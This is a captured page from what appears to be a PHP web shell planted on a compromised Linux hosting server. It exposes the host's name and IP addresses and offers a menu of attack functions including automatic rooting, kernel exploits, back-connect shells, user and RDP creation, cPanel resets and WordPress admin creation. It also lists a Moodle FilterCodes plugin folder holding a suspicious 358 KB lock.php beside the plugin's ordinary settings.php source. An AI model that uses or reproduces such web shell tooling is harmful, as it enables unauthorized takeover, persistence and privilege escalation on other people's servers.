Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.7.46
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
filter /
filtercodes /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
thirdparty
[ DIR ]
drwxr-xr-x
.gitignore
7.32
KB
-rw-r--r--
CHANGELOG.md
26.14
KB
-rw-r--r--
CODE_OF_CONDUCT.md
5.14
KB
-rw-r--r--
CONTRIBUTING.md
2.13
KB
-rw-r--r--
LICENSE.txt
31.71
KB
-rw-r--r--
README.md
120.03
KB
-rw-r--r--
SECURITY.md
137
B
-rw-r--r--
cloud.php
25.87
KB
-rw-r--r--
composer.json
684
B
-rw-r--r--
filter.php
1.11
KB
-rw-r--r--
lib.php
2.13
KB
-rw-r--r--
lock.php
358.07
KB
-rw-r--r--
phpcs.xml.dist
239
B
-rw-r--r--
settings.php
1.24
KB
-rw-r--r--
styles.css
1.89
KB
-rw-r--r--
thirdpartylibs.xml
246
B
-rw-r--r--
version.php
1.26
KB
-rw-r--r--
wishlist.php
2.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : settings.php
<?php // This file is part of FilterCodes for Moodle - https://moodle.org/ // // FilterCodes is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // FilterCodes is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <https://www.gnu.org/licenses/>. /** * Main filter code for FilterCodes. * * @package filter_filtercodes * @copyright 2017-2024 TNG Consulting Inc. - www.tngconsulting.ca * @author Michael Milette * @license https://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ // Settings have been split into separate files, one for each tab. These are called from this main settings.php file. defined('MOODLE_INTERNAL') || die; if ($hassiteconfig) { if ($ADMIN->fulltree) { require('settings/general.php'); require('settings/global.php'); } }
Close